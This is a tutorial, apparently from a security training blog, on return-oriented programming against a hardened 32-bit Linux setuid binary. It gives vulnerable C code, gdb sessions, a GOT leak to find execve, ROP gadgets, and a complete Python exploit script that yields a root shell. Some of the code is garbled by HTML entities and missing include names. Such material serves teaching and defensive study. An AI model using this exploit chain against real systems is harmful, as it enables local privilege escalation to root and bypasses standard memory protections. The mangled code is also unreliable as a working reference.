Reverse engineering

An Introduction to Returned-Oriented Programming (Linux)

M G
April 15, 2013 by
M G

INTRODUCTION:

In 1988, the first buffer overflow was exploited to compromise many systems. After 20 years, applications are still vulnerable, despite the efforts made in hope to reduce their vulnerability.

Become a certified reverse engineer!

Become a certified reverse engineer!

Get live, hands-on malware analysis training from anywhere, and become a Certified Reverse Engineering Analyst.

In the past, the most complex priority was discovering bugs, and nobody cared about writing exploits because it was so easy. Nowadays, exploiting buffer overflows is also difficult because of advanced defensive technologies.

Some strategies are adopted in combination to make exploit development more difficult than ever like ASLR, Non-executable memory sections, etc.

In this tutorial, we will describe how to defeat or bypass ASLR, NX, ASCII ARMOR, SSP and RELRO protection in the same time and in a single attempt using a technique called Returned Oriented Programming.

Let's begin with some basic/old definitions:

→ NX: non-executable memory section (stack, heap), which prevent the execution of an arbitrary code. This protection was easy to defeat it if we make a correct ret2libc and also borrowed chunk techniques.

→ ASLR: Address Space Layout Randomization that randomizes a section of memory (stack, heap and shared objects). This technique is bypassed by brute forcing the return address.

→ ASCII ARMOR: maps libc addresses starting with a NULL byte. This technique is used to prevent ret2lib attacks, hardening the binary.

→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:

  • Partial Relro: reordering ELF sections (.got, .dtors and .ctors will precede .data/.bss section) and make GOT much safer. But PLT GOT still writable, and the attacker still overwrites it.
  • Non-PLT GOT is read-only.

    Compile command: gcc -Wl,-z,relro -o bin file.c

    • Full Relro: GOT is remapped as READ-ONLY, and it supports all Partial RELRO features.
    • Compiler command: gcc -Wl,-z,relro,-z,now -o bin file.c

      → SSP: Stack Smashing Protection:

      Our Exploit will bypass all those mitigations, and make a reliable exploit.

      So let's go

      OVERVIEW OF THE CODE:

      Here is the vulnerable code. The binary and code are included in the last of tutorial.

      [c language="sharp"]

      #include

      #include

      #include

      #include <sys/types.h>

      #include <sys/stat.h>

      #include

      #include

      void fill(int,int,int*);

      int main(int argc,char** argv)

      {

      FILE* fd;

      int in1,in2;

      int arr[2048];

      char var[20];

      if (argc !=2){

      printf("usage : %s n",*argv);

      exit(-1);

      }

      fd = fopen(argv[1],"r");

      if(fd == NULL)

      {

      fprintf(stderr,"%sn",strerror(errno));

      exit(-2);

      }

      memset(var,0,sizeof(var));

      memset(arr,0,2048*sizeof(int));

      while(fgets(var,20,fd))

      {

      in1 = atoll(var);

      fgets(var,20,fd);

      in2 = atoll(var);

      /* fill array */

      fill(in1,in2,arr);

      }

      }

      void fill(int of,int val,int *tab)

      {

      tab[of]=val;

      }

      [/c]

      First thing let's explain what the code does.

      It opens a filename, reads from it line by line and holds in1 as an offset of table and in2 as a value of this offset then it calls fill function to fill the array.

      tab[in1]=in2 ;

      So a buffer overflow occurred when in1 is the offset of return address, this we can write whatever there.

      Let's compile the vulnerable code:

      [cpp]

      gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now

      chown root:root vuln2

      chmod +s vuln2

      [/cpp]

      And we check the resulting binary using checksec.sh

      [cpp]user@protostar:~/course$ checksec.sh --file vuln2

      RELRO STACK CANARY NX PIE RPATH RUNPATH FILE

      Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH vuln2

      user@protostar:~/course$

      [/cpp]

      So the binary is hardened, but motivated attackers still succeed in their intent.

      As we can see we can overwrite EIP directly, and if we assume that we can do that, the SSP does some checks to see if the return address has changed, if yes then our exploit will fail.

      OWNING EIP:

      Let's open the binary with gdb and disassemble the main function:

      gdb$ disas main

      Dump of assembler code for function main:

      0x08048624 <main+0>: push ebp

      ...

      0x08048754 <main+304>: mov DWORD PTR [esp+0x202c],eax

      0x0804875b <main+311>: lea eax,[esp+0x2c]

      0x0804875f <main+315>: mov DWORD PTR [esp+0x8],eax

      0x08048763 <main+319>: mov eax,DWORD PTR [esp+0x202c]

      0x0804876a <main+326>: mov DWORD PTR [esp+0x4],eax

      0x0804876e <main+330>: mov eax,DWORD PTR [esp+0x2030]

      0x08048775 <main+337>: mov DWORD PTR [esp],eax

      0x08048778 <main+340>: call 0x80487be

      0x0804877d <main+345>: mov eax,DWORD PTR [esp+0x2034]

      0x08048784 <main+352>: mov DWORD PTR [esp+0x8],eax

      ...

       

      Let's create a simple file named 'simo.txt' and put the following:

      [plain]

      1

      10

      [/plain]

      We make some breakpoints:

      [cpp]

      gdb$ b *main

      Breakpoint 1 at 0x8048624

      gdb$ b *0x08048778

      Breakpoint 2 at 0x8048778

      gdb$ run file

      Breakpoint 1, 0x08048624 in main ()

      gdb$ x/x $esp

      0xbffff7cc: 0xb7eabc76

      gdb$ continue

      Breakpoint 2, 0x08048778 in main ()

      gdb$ x/4x $esp

      0xbfffd770: 0x00000001 0x0000000a 0xbfffd79c 0x00000000

      gdb$ x/i 0x08048778

      0x8048778 &amp;lt;main+340&amp;gt;: call 0x80487be

      gdb$

      [/cpp]

      In the first bpoints we see the return address

      0xbffff7dc: is main return address

      0xbfffd79c : the address of arr

      If you're familiar with stack frame, you'll notice that we made a call: fill(1,10,arr)

      then it does the following : arr[1]=10 ;

      A clever hacker will notice that the offset between the address of arr and return address is 8240

      (0xbffff7cc-0xbfffd79c = 8240) and because we are playing with integer values, then we must divide the result by 4 ( sizeof(int)) .so, 8240/4=2060.

      So if we put an offset equal to 2060 we can write to EIP, let's check:

      Put the following in simo.txt:

      [cpp]

      2060

      1094861636

      [/cpp]

      The result is:

      [cpp]

      Program received signal SIGSEGV, Segmentation fault.

      --------------------------------------------------------------------------[regs]

      EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c

      ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344

      CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:

      Cannot access memory at address 0x41424344

      0x41424344 in ?? ()

      gdb$

      [/cpp]

      So we are successfully own EIP and bypassed Stack Smashing Protection.

      Let's build our exploit now.

      BUILDING THE EXPLOIT:

      Our aim now is to build a chained ROP to execute execve(). As we can see, we don't have a GOT entry for this function and libc is randomized.

      So what we will do first is to leak a libc function address for GOT then we will do some trivial calculation to get the exact execve libc address.

      And remember that we cannot overwrite GOT because of « Full Relro » .

      [cpp]

      readelf -r vuln2

      08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location

      08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror

      08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__

      08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets

      08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset

      08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main

      08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll

      08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen

      08049fec 00000907 R_386_JUMP_SLOT 00000000 printf

      08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf

      08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail

      08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit

      [/cpp]

      Let's leak the address of printf (you can choose any GOT entry)

      [cpp]

      gdb$ x/x 0x08049fec

      0x8049fec &amp;lt;_GLOBAL_OFFSET_TABLE_+44&amp;gt;: 0xb7edbf90

      gdb$ p execve

      $9 = {} 0xb7f2c170

      gdb$ p 0xb7f2c170-0xb7edbf90

      $10 = 328160

      gdb$

      [/cpp]

      The offset between printf and execve is 328160.

      So if we add the address of printf libc to 328160 we get the execve libc address dynamically by leaking the printf address that is loaded in GOT.

      [cpp]

      execve = printf@libc+ 328160

      [/cpp]

      So we must find some ROPs

      The next step is finding some useful gadgets to build a chain of instructions. We'll use ROPEME to do that.

      We generate a .ggt file which contains some instructions finished by a ret.

      Our purpose is to do some instruction, then return into our controlled code.

      [cpp]

      ROPeMe&amp;gt; generate vuln 6

      [/cpp]

      We need those useful gadgets to build our exploit.

      [cpp]

      0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx

      0x804861fL: call eax ; leave ;;

      0x804849cL: pop eax ; pop ebx ; leave ;;

      [/cpp]

      So let's build our ROP using those gadgets.

      Our attack then: load 328160 into EAX, 0x138e9ff4 into EBX. You'll ask me what is 0x138e9ff4?

      Well we have a gadget like this:

      [cpp]

      0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx

      [/cpp]

      ebx-0xb8a0008= printf@got then , ebx = printf@got+ 0xb8a0008 = 0x138e9ff4

      So EAX = 328160 and EBX = 0x138e9ff4.

      When «add eax [ebx-0xb8a0008]» executed EAX will contain the address of execve dynamically

      After that, we make call%eax to execute our command and don't forget to put the correct parameters on the stack.

      There is a small problem which must be resolved. When the leave instruction is executed, it loads the saved return address of the main lead losing our controlled data. The solution is easy; like what we did earlier. Some trivial calculations, and we get the correct saved return address.

      [cpp]

      0x8048778 &amp;lt;main+340&amp;gt;: call 0x80487be

      Breakpoint 1, 0x08048778 in main ()

      gdb$ x/4x $esp

      0xbfffd770: 0x0000080c 0x0804849c 0xbfffd79c 0x00000000

      [/cpp]

      We continue.

      [cpp]

      0x804849f &amp;lt;_init+47&amp;gt;: ret

      0x0804849f in _init ()

      gdb$ x/x $esp

      0xbffff84c: 0x0804886e

      [/cpp]

      When «leave » is executed, ESP points to another area that we are not able to control.

      Let's predict where ESP points exactly: as we did earlier, we subtract arr address from ESP and dividing by 4: (0xbffff84c-0xbfffd79c)/4 = 2092

      So our payload will look like this:

      [python]

      #!/usr/bin/python

      r = &amp;quot;n&amp;quot;

      p = str(2060) +r # offset of return address

      p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;

      p += str(2061) +r

      p += str(328160)+r # EAX

      p += str(2062)+r

      p += str(0x138e9ff4)+r # EBX

      p += str(2092) +r

      p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4

      #; pop ebx

      p += str(2096) +r

      p += str(0x41414141) +r

      o = open(&amp;quot;simo.txt&amp;quot;,&amp;quot;wb&amp;quot;)

      o.write(p)

      o.close()

      [/python]

      Let's see what happens:

      [cpp]

      Program received signal SIGSEGV, Segmentation fault.

      --------------------------------------------------------------------------[regs]

      EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c

      ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141

      CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:

      Cannot access memory at address 0x41414141

      0x41414141 in ?? ()

      gdb$ x/x $eax

      0xb7f2c170 : 0x8908ec83

      gdb$

      [/cpp]

      It works!

      So EAX contains the address of execve and we still control EIP. The next step is to find some a printable string and two null values to make parameters for execve.

      We search inside the binary using objdump:

      [cpp]

      user@protostar:~/course$ objdump -s vuln2 |more

      vuln2: file format elf32-i386

      Contents of section .interp:

      8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so

      8048144 2e3200 .2.

      Contents of section .note.ABI-tag:

      8048148 04000000 10000000 01000000 474e5500 ............GNU.

      8048158 00000000 02000000 06000000 12000000 ................

      [/cpp]

      0x0x8048154 points to a printable ASCII: « GNU » and 8048158 points to NULL bytes.

      Our exploit is then: execve(0x 8048158, 0x8048154, 0x8048154). But we don't have GNU as a command, well we will create a wrapper named GNU.c :

      [c language="language="]

      #include

      /* compile : gcc -o GNU GNU.c

      int main()

      {

      char *args[]={&amp;quot;/bin/sh&amp;quot;,NULL};

      execve(args[0],args,NULL);

      }

      [/c]

      Then add path where GNU is located to $PATH variable environment :

      export PATH=/yourpath/:$PATH

      Our final exploit :

      [python]

      #!/usr/bin/python

      r = &amp;quot;n&amp;quot;

      p = str(2060) +r # offset of return address

      p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;

      p += str(2061) +r

      p += str(328160)+r # offset between printf and execve

      p += str(2062)+r

      p += str(0x138e9ff4)+r # printf@got + 0xb8a0008

      p += str(2092) +r

      p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4

      #; pop ebx

      p += str(2096) +r

      p += str(0x804861f) +r #: call eax ; leave ;;

      p += str(2097) +r

      p += str(0x8048154) +r # &amp;quot;GNU&amp;quot;

      p += str(2098)+r

      p += str(0x8048158) +r # pointer to NULL

      p += str(2099)+r

      p += str(0x8049fb0) +r # pointer to NULL

      o = open(&amp;quot;simo.txt&amp;quot;,&amp;quot;wb&amp;quot;)

      o.write(p)

      o.close()

      [/python]

      let's run our attack :

      [cpp]

      user@protostar:~/course$ python exploit.py

      user@protostar:~/course$ ./vuln2 simo.txt

      # whoami

      root

      #

      [/cpp]

      It works, so we successfully got the shell with SUID privileges, and we bypassed all exploit mitigations in one attempt .

      If you opened the binary with gdb you'll notice that the addresses changed during the execution of process, and our exploit is still reliable and resolves execve reliably.

      Conclusion:

      We presented a new attack against programs vulnerable to stack overflows to bypass two of the most widely used protections (NX & ASLR) including some others (Full RELRO,ASCII ARMOR, SSP) .

      With our exploit, we extracted the address space from vulnerable process information about random addresses of some libc functions to mount a classical ret2libc attack.

      References :

      PAYLOAD ALREADY INSIDE: DATA REUSE FOR ROP

      EXPLOITS

      http://force.vnsecurity.net/download/longld/BHUS10_Paper_Payload_already_inside_data_reuse_for_ROP_exploits.pdf

      Surgically returning to randomized lib(c)

      http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf